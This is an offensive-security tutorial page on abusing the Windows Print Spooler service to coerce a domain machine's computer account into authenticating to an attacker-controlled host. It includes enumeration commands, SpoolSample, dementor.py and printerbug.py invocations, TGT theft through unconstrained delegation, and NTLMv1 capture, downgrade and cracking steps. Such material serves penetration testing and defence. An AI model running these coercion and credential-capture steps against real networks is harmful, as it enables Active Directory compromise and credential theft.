3.7 KiB
Printers Spooler Service abuse
If the Print Spooler service is enabled, you can use some already known AD credentials to request to the Domain Controller’s print server an update on new print jobs and just tell it to send the notification to some system.
Note when printer send the notification to an arbitrary systems, it needs to authenticate against that system. Therefore, an attacker can make the Print Spooler service authenticate against an arbitrary system, and the service will use the computer account in this authentication.
Finding Windows Servers on the domain
Using Powershell, get a list of Windows boxes. Servers are usually priority, so lets focus there:
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
Finding Spooler services listening
Using a slightly modified @mysmartlogin's Vincent Le Toux's
SpoolerScanner, see if the Spooler Service is listening:
. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}
You can also use rpcdump.py on Linux and look for the MS-RPRN Protocol
rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN
Ask the service to authenticate against an arbitrary host
You can compile SpoolSample from here.
SpoolSample.exe <TARGET> <RESPONDERIP>
or use 3xocyte's dementor.py or printerbug.py if you're on Linux
python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
Combining with Unconstrained Delegation
If an attacker has already compromised a computer with Unconstrained Delegation, the attacker could make the printer authenticate against this computer. Due to the unconstrained delegation, the TGT of the computer account of the printer will be saved in the memory of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to retrieve this ticket and abuse it [Pass the Ticket](pass-the-ticket.md)
.
NTLMv1 attack
Nowadays is becoming less common to find environments with Unconstrained Delegation configured, but this doesn't mean you can't abuse a Print Spooler service configured.
You could abuse some credentials/sessions you already have on the AD to ask the printer to authenticate against some host under your control. Then, using metasploit auxiliary/server/capture/smb
or responder
you can set the authentication challenge to 112233445566778899, capture the authentication attempt, and if it was done using NTLMv1 you will be able to crack it.
If you are using responder
you could try to use the flag --lm
to try to downgrade the authentication.
Note that for this technique the authentication must be performed using NTLMv1 NTLMv2 is not valid
.
Remember that the printer will use the computer account during the authentication, and computer accounts use long and random passwords that you probably won't be able to crack using common dictionaries. But the NTLMv1 authentication uses DES [more info here](../ntlm/#ntlmv1-challenge)
, so using some services specially dedicated to cracking DES you will be able to crack it you could use [https://crack.sh/](https://crack.sh/) for example
.